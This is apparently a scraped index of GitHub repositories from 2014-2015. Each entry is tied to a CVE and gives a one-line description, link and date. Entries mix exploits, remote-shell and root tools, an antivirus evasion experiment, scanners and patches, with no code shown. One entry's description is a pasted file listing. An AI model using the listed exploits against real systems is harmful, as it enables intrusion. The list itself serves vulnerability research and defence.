**Spider Exploit with CVE-2013-2842** : [173210/spider](https://github.com/173210/spider) create time: 2015-03-26T10:12:32Z

**no description** : [niccoX/patch-openssl-CVE-2014-0291_CVE-2015-0204](https://github.com/niccoX/patch-openssl-CVE-2014-0291_CVE-2015-0204) create time: 2015-03-23T10:18:08Z

**no description** : [SecurityObscurity/cve-2015-0313](https://github.com/SecurityObscurity/cve-2015-0313) create time: 2015-03-22T08:37:36Z

**Exploit of CVE-2011-1720.** : [nbeguier/postfix_exploit](https://github.com/nbeguier/postfix_exploit) create time: 2015-03-21T08:59:08Z

**TORQUE Resource Manager 2.5.x-2.5.13 stack based buffer overflow exploit CVE-2014-8729; CVE-2014-878** : [inso-/TORQUE-Resource-Manager-2.5.x-2.5.13-stack-based-buffer-overflow-exploit-CVE-2014-8729-CVE-2014-878](https://github.com/inso-/TORQUE-Resource-Manager-2.5.x-2.5.13-stack-based-buffer-overflow-exploit-CVE-2014-8729-CVE-2014-878) create time: 2015-03-20T22:41:03Z

**xnu local privilege escalation via cve-2015-1140 IOHIDSecurePromptClient injectStringGated heap overflow | poc||gtfo** : [kpwn/vpwn](https://github.com/kpwn/vpwn) create time: 2015-03-16T03:43:50Z

**:broken_heart: Hearbleed exploit to retrieve sensitive information CVE-2014-0160 :broken_heart:** : [mpgn/heartbleed-PoC](https://github.com/mpgn/heartbleed-PoC) create time: 2015-03-08T19:54:33Z

**CVE-2014-4321 exploit** : [android-rooting-tools/libmsm_vfe_read_exploit](https://github.com/android-rooting-tools/libmsm_vfe_read_exploit) create time: 2015-03-08T06:13:36Z

**no description** : [p1gl3t/CVE-2015-1474_poc](https://github.com/p1gl3t/CVE-2015-1474_poc) create time: 2015-03-06T17:04:55Z

**Basic BASH Script to Automate OpenSSL based testing for FREAK Attack (CVE-2015-0204) as advised by Akamai.** : [AbhishekGhosh/FREAK-Attack-CVE-2015-0204-Testing-Script](https://github.com/AbhishekGhosh/FREAK-Attack-CVE-2015-0204-Testing-Script) create time: 2015-03-06T09:40:54Z

**Multithreaded FREAK scanner, used to detect SSL EXP Ciphers, vulnerable to CVE-2015-0204** : [scottjpack/Freak-Scanner](https://github.com/scottjpack/Freak-Scanner) create time: 2015-03-05T19:21:50Z

**This script check if your list of server is accepting Export cipher suites and could be vulnerable to CVE-2015-0204** : [felmoltor/FreakVulnChecker](https://github.com/felmoltor/FreakVulnChecker) create time: 2015-03-04T14:35:54Z

**This is a Python Application that helps you detect if your machine that run bash is vulnerable by CVE-2014-6271** : [akiraaisha/shellshocker-python](https://github.com/akiraaisha/shellshocker-python) create time: 2015-02-22T17:32:48Z

**Universal xss PoC with multiple target sites (CVE-2015-0072)** : [dbellavista/uxss-poc](https://github.com/dbellavista/uxss-poc) create time: 2015-02-21T23:03:48Z

**Exploit based on a faulty clone(2) implementation in Linux < 2.6.36.2 that allows overwrite of arbitrary kernel word with NULL. Research and personal-security use only. Not malicious.** : [johnreginald/CVE-2010-4258](https://github.com/johnreginald/CVE-2010-4258) create time: 2015-02-17T01:12:55Z

**ParrotNG is a tool capable of identifying Adobe Flex applications (SWF) vulnerable to CVE-2011-2461** : [ikkisoft/ParrotNG](https://github.com/ikkisoft/ParrotNG) create time: 2015-02-08T05:49:07Z

**:poodle: Poodle (Padding Oracle On Downgraded Legacy Encryption) attack CVE-2014-3566 :poodle:** : [mpgn/poodle-PoC](https://github.com/mpgn/poodle-PoC) create time: 2015-02-03T20:28:27Z

**LG On Screen Phone authentication bypass PoC (CVE-2014-8757)** : [irsl/lgosp-poc](https://github.com/irsl/lgosp-poc) create time: 2015-02-03T13:46:45Z

**A shared library wrapper with additional checks for vulnerable functions gethostbyname2_r gethostbyname_r (GHOST vulnerability)** : [makelinux/CVE-2015-0235-workaround](https://github.com/makelinux/CVE-2015-0235-workaround) create time: 2015-02-02T11:16:42Z

**:unlock: CVE-2011-4919 -- mpack information disclosure demo (C)** : [hartwork/mpacktrafficripper](https://github.com/hartwork/mpacktrafficripper) create time: 2015-02-01T00:26:07Z

**glibc gethostbyname bug** : [tobyzxj/CVE-2015-0235](https://github.com/tobyzxj/CVE-2015-0235) create time: 2015-01-30T09:58:09Z

**Script to test vulnarability for CVE-2015-0235** : [JustDenisYT/ghosttester](https://github.com/JustDenisYT/ghosttester) create time: 2015-01-30T06:37:06Z

**Playbooks 'Fix for CVE-2015-0235(GHOST)' running on Ansible** : [F88/ghostbusters15](https://github.com/F88/ghostbusters15) create time: 2015-01-29T12:52:45Z

**Writeup of the Oracle DSR stack buffer overflow vulnerability (DRA) CVE-2014-6598** : [KPN-CISO/DRA_writeup](https://github.com/KPN-CISO/DRA_writeup) create time: 2015-01-29T09:43:23Z

**cookbook for update glibc. CVE-2015-0235(GHOST)** : [koudaiii-archives/cookbook-update-glibc](https://github.com/koudaiii-archives/cookbook-update-glibc) create time: 2015-01-29T07:14:17Z

**gethostbyname*() buffer overflow exploit in glibc - CVE-2015-0235 https://community.qualys.com/blogs/laws-of-vulnerabilities/2015/01/27/the-ghost-vulnerability** : [nickanderson/cfengine-CVE_2015_0235](https://github.com/nickanderson/cfengine-CVE_2015_0235) create time: 2015-01-29T04:58:54Z

**CVE-2015-0235 patches lenny libc6 packages for amd64** : [favoretti/lenny-libc6](https://github.com/favoretti/lenny-libc6) create time: 2015-01-28T23:09:13Z

**Ansible playbook, to check for CVE-2015-0235 (GHOST) vulnerability** : [adherzog/ansible-CVE-2015-0235-GHOST](https://github.com/adherzog/ansible-CVE-2015-0235-GHOST) create time: 2015-01-28T21:22:33Z

**no description** : [mholzinger/CVE-2015-0235_GHOST](https://github.com/mholzinger/CVE-2015-0235_GHOST) create time: 2015-01-28T04:22:05Z

**glibc vulnerability GHOST(CVE-2015-0235) Affected software list** : [piyokango/ghost](https://github.com/piyokango/ghost) create time: 2015-01-28T00:14:35Z

**Apple CoreGraphics framework fails to validate the input when parsing CCITT group 3 encoded data resulting in a heap overflow condition. A small heap memory allocation can be overflowed with controlled data from the input resulting in arbitrary code execution in the context of Mobile Safari.** : [feliam/CVE-2014-4481](https://github.com/feliam/CVE-2014-4481) create time: 2015-01-28T00:02:06Z

**Ansible playbook to check vulnerability for CVE-2015-0235** : [aaronfay/CVE-2015-0235-test](https://github.com/aaronfay/CVE-2015-0235-test) create time: 2015-01-27T23:45:22Z

**A chef cookbook to test the GHOST vulnerability** : [mikesplain/CVE-2015-0235-cookbook](https://github.com/mikesplain/CVE-2015-0235-cookbook) create time: 2015-01-27T20:34:42Z

**Test wether you're exposed to ghost (CVE-2015-0235). All kudos go to Qualys Security** : [fser/ghost-checker](https://github.com/fser/ghost-checker) create time: 2015-01-27T17:31:33Z

**JBoss Autopwn as featured at BlackHat Europe 2010 - this version incorporates CVE-2010-0738 the JBoss authentication bypass VERB manipulation vulnerability as discovered by Minded Security** : [ChristianPapathanasiou/jboss-autopwn](https://github.com/ChristianPapathanasiou/jboss-autopwn) create time: 2015-01-27T13:16:45Z

**Gain privileges:system -> root,as a part of https://github.com/retme7/CVE-2014-7911_poc** : [retme7/CVE-2014-4322_poc](https://github.com/retme7/CVE-2014-4322_poc) create time: 2015-01-26T07:02:26Z

**Local root exploit for Nexus5 Android 4.4.4(KTU84P)** : [retme7/CVE-2014-7911_poc](https://github.com/retme7/CVE-2014-7911_poc) create time: 2015-01-26T06:33:52Z

**Libvirt - Unauthenticated DoS Vulnerability (Exploit & Time Randomization to Thwart It)** : [tagatac/libvirt-CVE-2014-1447](https://github.com/tagatac/libvirt-CVE-2014-1447) create time: 2015-01-24T17:54:08Z

**no description** : [day6reak/CVE-2014-4140](https://github.com/day6reak/CVE-2014-4140) create time: 2015-01-20T23:56:14Z

**no description** : [day6reak/CVE-2014-4109](https://github.com/day6reak/CVE-2014-4109) create time: 2015-01-20T23:35:26Z

**no description** : [day6reak/CVE-2014-1773](https://github.com/day6reak/CVE-2014-1773) create time: 2015-01-20T23:32:21Z

**no description** : [tjjh89017/cve-2014-6332](https://github.com/tjjh89017/cve-2014-6332) create time: 2015-01-14T09:57:34Z

**cve2014-3153 exploit for ubuntu x86** : [lieanu/CVE-2014-3153](https://github.com/lieanu/CVE-2014-3153) create time: 2015-01-12T16:53:09Z

**Updates OS X 10.6.8 NTP to include patch for CVE-2014-9295** : [MacMiniVault/NTPUpdateSnowLeopard](https://github.com/MacMiniVault/NTPUpdateSnowLeopard) create time: 2014-12-26T15:30:12Z

**pyonpyon** : [hakatashi/CVE-2014-9390](https://github.com/hakatashi/CVE-2014-9390) create time: 2014-12-19T00:17:09Z

**PoC for CVE-2014-9390** : [mdisec/CVE-2014-9390](https://github.com/mdisec/CVE-2014-9390) create time: 2014-12-19T00:04:06Z

**CVE-2014-0196: Linux kernel pty layer race condition memory corruption** : [tempbottle/CVE-2014-0196](https://github.com/tempbottle/CVE-2014-0196) create time: 2014-12-17T07:39:00Z

**NTP monlist scanner CVE-2013-5211** : [suedadam/ntpscanner](https://github.com/suedadam/ntpscanner) create time: 2014-12-14T18:58:26Z

**Python scripts to exploit CVE-2014-9016 and CVE-2014-9034** : [c0r3dump3d/wp_drupal_timing_attack](https://github.com/c0r3dump3d/wp_drupal_timing_attack) create time: 2014-12-01T14:16:17Z

**app turn nil publics and privates into blanks 3 months ago config Use bundler/setup for more graceful bundler related failures 11 days ago data Add token fiddling from nishang 12 hours ago db Revert "Diff triggering comment" 12 days ago documentation Switch to Msf::OperatingSystems::Match::WINDOWS 2 months ago external Use PDWORD_PTR and DWORD_PTR 29 days ago features Up aruba timeout for simplecov overhead 4 days ago lib Check for load errors in reload_all 4 days ago modules Land #4255 - CVE-2014-6332 Internet Explorer 19 hours ago plugins Land #3588, @tobd-r7's Fix SpaceBeforeModifierKeyword Rubocop warning 4 months ago script rails generate cucumber:install 3 months ago scripts delete the old script a month ago spec Remove debug file writes 2 days ago test Fix up comment splats with the correct URI a month ago tools Fix bugs 24 days ago .gitignore Add note about rbenv for rvm .versions.conf local override 24 days ago .gitmodules Add RDI submodule, port Kitrap0d a year ago .mailmap Add @trosen-r7's alias for commits 6 months ago .rspec Add modern --require to .rspec 2 months ago .rubocop.yml Reapply PR #4113 (removed via #4175) 18 days ago .ruby-gemset Restoring ruby and gemset files 6 months ago .ruby-version Oh good, another Ruby version bump 14 days ago .simplecov Remove fastlib 2 months ago .travis.yml Enable fast_finish on travis-ci 12 days ago .yardopts Various merge resolutions from master <- staging 4 months ago CONTRIBUTING.md Add a don't to CONTRIBUTING about merge messages 11 days ago COPYING With 66 days left in 2014, may as well update a month ago Gemfile metasploit-credential bump to 0.13.3 16 days ago Gemfile.local.example Various merge resolutions from master <- staging 4 months ago Gemfile.lock Bump mdm version number 12 days ago HACKING Update link for The Metasploit Development Environment 5 months ago LICENSE Remove fastlib 2 months ago README.md Encourage use of the installer for users. 8 months ago Rakefile Merge branch 'feature/MSP-11130/metasploit-framework-spec-constants' … 24 days ago metasploit-framework-db.gemspec metasploit-credential bump to 0.13.3 16 days ago metasploit-framework-full.gemspec Update metasploit-framework-full.gemspec 23 days ago metasploit-framework-pcap.gemspec Depend on metasloit-framework in optional gemspecs 24 days ago metasploit-framework.gemspec Update meterpreter_bins to 0.0.11 18 days ago msfbinscan Remove fastlib 2 months ago msfcli Fix thread-leaks in msfcli spec 17 days ago msfconsole @wvu-r7 is a skilled negotiator. s/stdout/stderr/ a month ago msfd Remove fastlib 2 months ago msfelfscan Remove fastlib 2 months ago msfencode Remove fastlib 2 months ago msfmachscan Remove fastlib 2 months ago msfpayload fixes merge conflicts msfpayload & exe a month ago msfpescan Remove fastlib 2 months ago msfrop Remove fastlib 2 months ago msfrpc Remove fastlib 2 months ago msfrpcd Remove call to legacy db.sink queue, closes #4244 7 days ago msfupdate Always use maybe_wait_and_exit in msfupdate a year ago msfvenom Fix #4047 - undefined method `rank' due to an invalid encoder name 19 days ago README.md** : [MarkoArmitage/metasploit-framework](https://github.com/MarkoArmitage/metasploit-framework) create time: 2014-11-29T11:01:01Z

**Spydir is a small utility to monitor file changes in Windows directory regardless of subdirectory and files permissions (exploits CVE-2007-0843)** : [z3APA3A/spydir](https://github.com/z3APA3A/spydir) create time: 2014-11-27T14:36:05Z

**PowerShell CVE-2014-4113** : [johnjohnsp1/CVE-2014-4113](https://github.com/johnjohnsp1/CVE-2014-4113) create time: 2014-11-19T04:26:33Z

**CVE-2000-0170** : [mike182/exploit](https://github.com/mike182/exploit) create time: 2014-11-08T15:21:30Z

**:scream: Python library and utility for CVE-2014-6271 (aka. "shellshock")** : [ramnes/pyshellshock](https://github.com/ramnes/pyshellshock) create time: 2014-11-06T19:45:54Z

**DEPRECATED: Chef cookbook to audit & remediate "Shellshock" (BASH-CVE-2014-7169)** : [chef-boneyard/bash-shellshock](https://github.com/chef-boneyard/bash-shellshock) create time: 2014-10-31T21:12:24Z

**CloudPassage Halo policy for detecting vulnerability to CVE-2014-3566 (AKA POODLE)** : [ashmastaflash/mangy-beast](https://github.com/ashmastaflash/mangy-beast) create time: 2014-10-17T22:30:03Z

**Python script for automatically protecting your systems against POODLE vulnerability (CVE-2014-3566)** : [stdevel/poodle_protector](https://github.com/stdevel/poodle_protector) create time: 2014-10-16T07:49:23Z

**no description** : [mikesplain/CVE-2014-3566-poodle-cookbook](https://github.com/mikesplain/CVE-2014-3566-poodle-cookbook) create time: 2014-10-16T01:24:38Z

**Exploit for CVE-2014-7236** : [m0nad/CVE-2014-7236_Exploit](https://github.com/m0nad/CVE-2014-7236_Exploit) create time: 2014-10-12T21:28:24Z

**Heartbleed (CVE-2014-0160) SSLv3 Scanner** : [vortextube/ssl_scanner](https://github.com/vortextube/ssl_scanner) create time: 2014-10-12T05:13:06Z

**Repository for CVE-2014-4936 POC code.** : [0x3a/CVE-2014-4936](https://github.com/0x3a/CVE-2014-4936) create time: 2014-10-05T19:10:30Z

**Libsafe - Safety Check Bypass Vulnerability (Proof of Concept Exploit & Time Randomization to Thwart It)** : [tagatac/libsafe-CVE-2005-1125](https://github.com/tagatac/libsafe-CVE-2005-1125) create time: 2014-10-04T21:27:57Z

**CydiaSubstrate-based fix for CVE-2014-4377.** : [davidmurray/CVE-2014-4377](https://github.com/davidmurray/CVE-2014-4377) create time: 2014-10-04T00:16:04Z

**Android app to scan for bash Vulnerability - CVE-2014-6271 also known as Shellshock** : [indiandragon/Shellshock-Vulnerability-Scan](https://github.com/indiandragon/Shellshock-Vulnerability-Scan) create time: 2014-10-03T16:22:28Z

**This module determine the vulnerability of a bash binary to the shellshock exploits (CVE-2014-6271 or CVE-2014-7169) and then patch that where possible** : [renanvicente/puppet-shellshock](https://github.com/renanvicente/puppet-shellshock) create time: 2014-09-29T18:57:38Z

**shellshock CVE-2014-6271 CGI Exploit, Use like Openssh via CGI** : [cj1324/CGIShell](https://github.com/cj1324/CGIShell) create time: 2014-09-29T16:02:15Z

**no description** : [ryeyao/CVE-2014-6271_Test](https://github.com/ryeyao/CVE-2014-6271_Test) create time: 2014-09-29T13:16:08Z

**CVE-2014-6271 Remote Interactive Shell - PoC Exploit** : [sch3m4/RIS](https://github.com/sch3m4/RIS) create time: 2014-09-29T10:06:18Z

**A script, in C, to check if CGI scripts are vulnerable to CVE-2014-6271 (The Bash Bug)** : [proclnas/ShellShock-CGI-Scan](https://github.com/proclnas/ShellShock-CGI-Scan) create time: 2014-09-28T18:05:20Z

**A python script to enumerate CGI scripts vulnerable to CVE-2014-6271 on one specific server** : [francisck/shellshock-cgi](https://github.com/francisck/shellshock-cgi) create time: 2014-09-28T04:08:07Z

**no description** : [u20024804/bash-4.3-fixed-CVE-2014-6271](https://github.com/u20024804/bash-4.3-fixed-CVE-2014-6271) create time: 2014-09-27T22:22:41Z

**no description** : [u20024804/bash-4.2-fixed-CVE-2014-6271](https://github.com/u20024804/bash-4.2-fixed-CVE-2014-6271) create time: 2014-09-27T22:22:27Z

**no description** : [u20024804/bash-3.2-fixed-CVE-2014-6271](https://github.com/u20024804/bash-3.2-fixed-CVE-2014-6271) create time: 2014-09-27T21:29:23Z

**Using google to scan sites for "ShellShock" (CVE-2014-6271)** : [vonnyfly/shellshock_crawler](https://github.com/vonnyfly/shellshock_crawler) create time: 2014-09-27T04:08:19Z

**A simple python shell-like exploit for the Shellschok CVE-2014-6271 bug.** : [pwnGuy/shellshock-shell](https://github.com/pwnGuy/shellshock-shell) create time: 2014-09-27T02:03:03Z

**Debian Lenny Bash packages with cve-2014-6271 patches (i386 and amd64)** : [internero/debian-lenny-bash_3.2.52-cve-2014-6271](https://github.com/internero/debian-lenny-bash_3.2.52-cve-2014-6271) create time: 2014-09-26T18:59:04Z

**Ansible role to check the CVE-2014-6271 vulnerability** : [teedeedubya/bash-fix-exploit](https://github.com/teedeedubya/bash-fix-exploit) create time: 2014-09-26T15:21:10Z

**Salt recipe for shellshock (CVE-2014-6271)** : [APSL/salt-shellshock](https://github.com/APSL/salt-shellshock) create time: 2014-09-26T10:30:37Z

**CVE 2014-6271 PoC Tool by kaitoY** : [ksang/shellshock](https://github.com/ksang/shellshock) create time: 2014-09-26T04:41:51Z

**scaner for cve-2014-6271** : [villadora/CVE-2014-6271](https://github.com/villadora/CVE-2014-6271) create time: 2014-09-26T04:15:15Z

**An A/V evasion armoring experiment for CVE-2012-4681** : [benjholla/CVE-2012-4681-Armoring](https://github.com/benjholla/CVE-2012-4681-Armoring) create time: 2014-09-26T02:33:24Z

**CVE-2014-6271 (ShellShock) RCE PoC tool** : [securusglobal/BadBash](https://github.com/securusglobal/BadBash) create time: 2014-09-26T01:30:14Z

**scripts associate with bourne shell EVN function parsing vulnerability CVE-2014-6271** : [themson/shellshock](https://github.com/themson/shellshock) create time: 2014-09-25T22:22:40Z

**CVE-2014-6271の検証用Vagrantfileです** : [ariarijp/vagrant-shellshock](https://github.com/ariarijp/vagrant-shellshock) create time: 2014-09-25T16:19:41Z

**no description** : [woltage/CVE-2014-6271](https://github.com/woltage/CVE-2014-6271) create time: 2014-09-25T13:06:50Z

**Simple script to check for CVE-2014-6271** : [gabemarshall/shocknaww](https://github.com/gabemarshall/shocknaww) create time: 2014-09-25T12:46:13Z

**CVE-2014-6271 RCE tool** : [RainMak3r/Rainstorm](https://github.com/RainMak3r/Rainstorm) create time: 2014-09-25T12:28:33Z

**Quick and dirty nessus .audit file to check is bash is vulnerable to CVE-2014-6271** : [ilismal/Nessus_CVE-2014-6271_check](https://github.com/ilismal/Nessus_CVE-2014-6271_check) create time: 2014-09-25T09:02:42Z

**no description** : [mattclegg/CVE-2014-6271](https://github.com/mattclegg/CVE-2014-6271) create time: 2014-09-25T08:10:26Z

**a auto script to fix CVE-2014-6271 bash vulnerability** : [justzx2011/bash-up](https://github.com/justzx2011/bash-up) create time: 2014-09-25T06:24:18Z

**Written fro CVE-2014-6271** : [Anklebiter87/Cgi-bin_bash_Reverse](https://github.com/Anklebiter87/Cgi-bin_bash_Reverse) create time: 2014-09-25T02:47:25Z

**Python Scanner for "ShellShock" (CVE-2014-6271)** : [scottjpack/shellshock_scanner](https://github.com/scottjpack/shellshock_scanner) create time: 2014-09-25T02:15:24Z

**no description** : [rrreeeyyy/cve-2014-6271-spec](https://github.com/rrreeeyyy/cve-2014-6271-spec) create time: 2014-09-25T01:12:04Z

**Chef cookbook that will fail if bash vulnerability found per CVE-2014-6271** : [jblaine/cookbook-bash-CVE-2014-6271](https://github.com/jblaine/cookbook-bash-CVE-2014-6271) create time: 2014-09-25T00:11:01Z

**patched-bash-4.3 for CVE-2014-6271** : [ryancnelson/patched-bash-4.3](https://github.com/ryancnelson/patched-bash-4.3) create time: 2014-09-24T21:24:43Z

**Patch for CVE-2014-6271** : [npm/ansible-bashpocalypse](https://github.com/npm/ansible-bashpocalypse) create time: 2014-09-24T18:27:03Z

**Collected fixes for bash CVE-2014-6271** : [dlitz/bash-cve-2014-6271-fixes](https://github.com/dlitz/bash-cve-2014-6271-fixes) create time: 2014-09-24T16:26:17Z

**This is a workaround for CVE-2014-0993 and CVE-2014-0994 that patches on memory without the need to recompile your vulnerable software. This is not the Embarcadero official fix, this is only CORE Security workaround.** : [helpsystems/Embarcadero-Workaround](https://github.com/helpsystems/Embarcadero-Workaround) create time: 2014-09-22T21:38:26Z

**Research of CVE-2014-3153 and its famous exploit towelroot on x86** : [geekben/towelroot](https://github.com/geekben/towelroot) create time: 2014-09-20T08:24:15Z

**A deadlock on the mmap semaphore ‘mmap sem’ in the CentOS 3.9 kernel, that is triggered by a specific interleaving of concurrent threads, one calling the mmap system call and the other calling the mincore system call.** : [tagatac/linux-CVE-2006-4814](https://github.com/tagatac/linux-CVE-2006-4814) create time: 2014-09-18T16:38:24Z

**no description** : [feliam/CVE-2014-4378](https://github.com/feliam/CVE-2014-4378) create time: 2014-09-17T18:17:03Z

**no description** : [feliam/CVE-2014-4377](https://github.com/feliam/CVE-2014-4377) create time: 2014-09-17T18:16:10Z

**CVE-2014-3153 exploit** : [android-rooting-tools/libfutex_exploit](https://github.com/android-rooting-tools/libfutex_exploit) create time: 2014-09-13T06:54:07Z

**Test case for Node.JS V0.10.31 v8 backport CVE-2013-6668 crash** : [sdneon/CveTest](https://github.com/sdneon/CveTest) create time: 2014-09-10T08:27:05Z

**Scans NTP servers for CVE-2013-5211 NTP DDOS amplification vulnerability.** : [dani87/ntpscanner](https://github.com/dani87/ntpscanner) create time: 2014-09-07T16:02:25Z

**no description** : [molnarg/cve-2014-0521](https://github.com/molnarg/cve-2014-0521) create time: 2014-08-23T09:54:18Z

**Annotated FBI exploit for the Tor Browser Bundle from mid-2013 (CVE-2013-1690)** : [vlad902/annotated-fbi-tbb-exploit](https://github.com/vlad902/annotated-fbi-tbb-exploit) create time: 2014-08-19T03:16:49Z

**Technicolor TC7200 - Credentials Disclosure CVE : CVE-2014-1677** : [tihmstar/freePW_tc7200Eploit](https://github.com/tihmstar/freePW_tc7200Eploit) create time: 2014-07-31T17:01:29Z

**AtomicReferenceArray Hack** : [frg316/cve2012-0507](https://github.com/frg316/cve2012-0507) create time: 2014-07-30T23:57:23Z

**CVE-2014-3153 aka towelroot** : [timwr/CVE-2014-3153](https://github.com/timwr/CVE-2014-3153) create time: 2014-07-24T13:28:00Z

**no description** : [secretnonempty/CVE-2014-0224](https://github.com/secretnonempty/CVE-2014-0224) create time: 2014-07-16T13:09:41Z

**no description** : [ssllabs/openssl-ccs-cve-2014-0224](https://github.com/ssllabs/openssl-ccs-cve-2014-0224) create time: 2014-07-15T10:03:16Z

**Used for evaluating hosts for CVE-2014-0224** : [droptables/ccs-eval](https://github.com/droptables/ccs-eval) create time: 2014-07-10T21:32:28Z

**no description** : [iph0n3/CVE-2014-0224](https://github.com/iph0n3/CVE-2014-0224) create time: 2014-07-08T08:08:00Z

**POC Code to exploite CVE-2014-3120** : [echohtp/ElasticSearch-CVE-2014-3120](https://github.com/echohtp/ElasticSearch-CVE-2014-3120) create time: 2014-07-07T20:28:34Z

**CVE-2014-3341 exploit** : [ehabhussein/snmpvlan](https://github.com/ehabhussein/snmpvlan) create time: 2014-06-28T09:34:35Z

**Exploit for cve-2012-3137 Oracle challenge** : [r1-/cve-2012-3137](https://github.com/r1-/cve-2012-3137) create time: 2014-06-18T16:23:52Z

**This script is designed for detection of vulnerable servers (CVE-2014-0224.) in a wide range of configurations. It attempts to negotiate using each affected protocol version (SSLv3, TLSv1, TLSv1.1, and TLSv1.2) advertising a comprehensive set of ciphers.** : [Tripwire/OpenSSL-CCS-Inject-Test](https://github.com/Tripwire/OpenSSL-CCS-Inject-Test) create time: 2014-06-12T04:44:13Z

**OpenSSL heap overflow PoC (CVE-2014-0195)** : [ricedu/CVE-2014-0195](https://github.com/ricedu/CVE-2014-0195) create time: 2014-06-10T09:28:22Z

**struts1 CVE-2014-0114 classLoader manipulation vulnerability patch** : [ricedu/struts1-patch](https://github.com/ricedu/struts1-patch) create time: 2014-06-10T08:27:10Z

**Proof of Concept for CVE-2014-3466 (GnuTLS buffer overflow: session id length check)** : [azet/CVE-2014-3466_PoC](https://github.com/azet/CVE-2014-3466_PoC) create time: 2014-06-01T20:36:31Z

**A request parameter filter solution for Struts 1 CVE-2014-0114 based on the work of Alvaro Munoz and the HP Fortify team** : [rgielen/struts1filter](https://github.com/rgielen/struts1filter) create time: 2014-05-22T19:14:54Z

**Demonstration of CVE-2014-3120** : [jeffgeiger/es_inject](https://github.com/jeffgeiger/es_inject) create time: 2014-05-13T16:37:29Z

**no description** : [SunRain/CVE-2014-0196](https://github.com/SunRain/CVE-2014-0196) create time: 2014-05-13T12:34:51Z

**cve-2014-0130 rails directory traversal vuln** : [omarkurt/cve-2014-0130](https://github.com/omarkurt/cve-2014-0130) create time: 2014-05-08T14:40:36Z

**CVE-2014-0160 (Heartbeat Buffer over-read bug)** : [OffensivePython/HeartLeak](https://github.com/OffensivePython/HeartLeak) create time: 2014-05-03T18:08:27Z

**Maltego transform to detect the OpenSSL Heartbleed vulnerability (CVE-2014-0160)** : [DisK0nn3cT/MaltegoHeartbleed](https://github.com/DisK0nn3cT/MaltegoHeartbleed) create time: 2014-05-01T08:28:45Z

**Proof of concept for CVE-2015-0006. Fixed in MS15-005 https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2015/ms15-005 .** : [bugch3ck/imposter](https://github.com/bugch3ck/imposter) create time: 2014-04-29T01:05:57Z

**CVE-2014-0094 test program for struts1** : [HasegawaTadamitsu/CVE-2014-0094-test-program-for-struts1](https://github.com/HasegawaTadamitsu/CVE-2014-0094-test-program-for-struts1) create time: 2014-04-27T11:31:59Z

**POC of CVE-2014-0166 (WordPress cookie forgery vulnerability)** : [Ettack/POC-CVE-2014-0166](https://github.com/Ettack/POC-CVE-2014-0166) create time: 2014-04-26T10:14:44Z

**Our final project for the Spring 2014 CS465 (Information Visualization) class at Middlebury College -- a visualizer for CVE vulnerabilities.** : [dantrauner/cs465finalproject](https://github.com/dantrauner/cs465finalproject) create time: 2014-04-20T23:19:43Z

**openssl Heartbleed bug(CVE-2014-0160) check for Node.js** : [yryz/heartbleed.js](https://github.com/yryz/heartbleed.js) create time: 2014-04-19T06:20:44Z

**I think this CVE is full of lies and deceit and very confusing code.** : [adrienthebo/cve-2014-2734](https://github.com/adrienthebo/cve-2014-2734) create time: 2014-04-17T06:51:01Z

**Ruby OpenSSL CA Private Key Spoofing** : [gdisneyleugers/CVE-2014-2734](https://github.com/gdisneyleugers/CVE-2014-2734) create time: 2014-04-16T18:38:12Z

**A checker (site and tool) for CVE-2014-0160** : [mozilla-services/Heartbleed](https://github.com/mozilla-services/Heartbleed) create time: 2014-04-15T22:22:18Z

**OpenSSL Heartbleed (CVE-2014-0160) vulnerability scanner, data miner and RSA key-restore tools.** : [einaros/heartbleed-tools](https://github.com/einaros/heartbleed-tools) create time: 2014-04-15T14:09:54Z

**A checker (site and tool) for CVE-2014-0160:** : [indiw0rm/-Heartbleed-](https://github.com/indiw0rm/-Heartbleed-) create time: 2014-04-15T09:30:40Z

**A research tool designed to check for OpenSSL CVE-2014-0160 vulnerability** : [xlucas/heartbleed](https://github.com/xlucas/heartbleed) create time: 2014-04-13T19:18:32Z

**Nmap NSE script that discovers/exploits Heartbleed/CVE-2014-0160.** : [GeeksXtreme/ssl-heartbleed.nse](https://github.com/GeeksXtreme/ssl-heartbleed.nse) create time: 2014-04-13T12:14:29Z

**Test script for test 1Password database for SSL Hea(r)t Bleeding (CVE-2014-0160)** : [idkqh7/heatbleeding](https://github.com/idkqh7/heatbleeding) create time: 2014-04-13T05:52:43Z

**Script to find Exit and Guard nodes in the Tor Network, that are still suffering from CVE-2014-0160** : [wwwiretap/bleeding_onions](https://github.com/wwwiretap/bleeding_onions) create time: 2014-04-12T21:04:55Z

**POC for CVE-2014-0160 (Heartbleed) for DTLS** : [hreese/heartbleed-dtls](https://github.com/hreese/heartbleed-dtls) create time: 2014-04-12T14:13:36Z

**CVE-2014-0160 scanner** : [a0726h77/heartbleed-test](https://github.com/a0726h77/heartbleed-test) create time: 2014-04-11T14:24:54Z

**OpenSSL Heartbleed (CVE-2014-0160) Fix script** : [sammyfung/openssl-heartbleed-fix](https://github.com/sammyfung/openssl-heartbleed-fix) create time: 2014-04-10T19:47:42Z

**CVE-2014-0160 mass test against subdomains** : [siddolo/knockbleed](https://github.com/siddolo/knockbleed) create time: 2014-04-10T17:12:53Z

**This repo contains a script to automatically test sites for vulnerability to the Heartbleed Bug (CVE-2014-0160) based on the input file for the urls.** : [waqasjamal-zz/HeartBleed-Vulnerability-Checker](https://github.com/waqasjamal-zz/HeartBleed-Vulnerability-Checker) create time: 2014-04-10T11:42:33Z

**no description** : [ice-security88/CVE-2014-0160](https://github.com/ice-security88/CVE-2014-0160) create time: 2014-04-10T04:27:10Z

**Heartbleed variants** : [0x90/CVE-2014-0160](https://github.com/0x90/CVE-2014-0160) create time: 2014-04-10T02:47:43Z

**Test CIDR blocks for CVE-2014-0160/Heartbleed** : [amerine/coronary](https://github.com/amerine/coronary) create time: 2014-04-10T02:28:05Z

**Exploit for CVE-2014-160 (heartbleed) with required patch for libopenssl** : [GitMirar/heartbleed_exploit](https://github.com/GitMirar/heartbleed_exploit) create time: 2014-04-09T23:33:33Z

**A firefox extension and checker for CVE-2014-0160** : [proactiveRISK/heartbleed-extention](https://github.com/proactiveRISK/heartbleed-extention) create time: 2014-04-09T21:20:56Z

**CVE-2014-160 exploit** : [menrcom/CVE-2014-160](https://github.com/menrcom/CVE-2014-160) create time: 2014-04-09T19:28:06Z

**Test for SSL heartbeat vulnerability (CVE-2014-0160)** : [sensepost/heartbleed-poc](https://github.com/sensepost/heartbleed-poc) create time: 2014-04-09T15:59:14Z

**Checks for vulnerabilities: CVE-2014-0160** : [zouguangxian/heartbleed](https://github.com/zouguangxian/heartbleed) create time: 2014-04-09T05:29:36Z

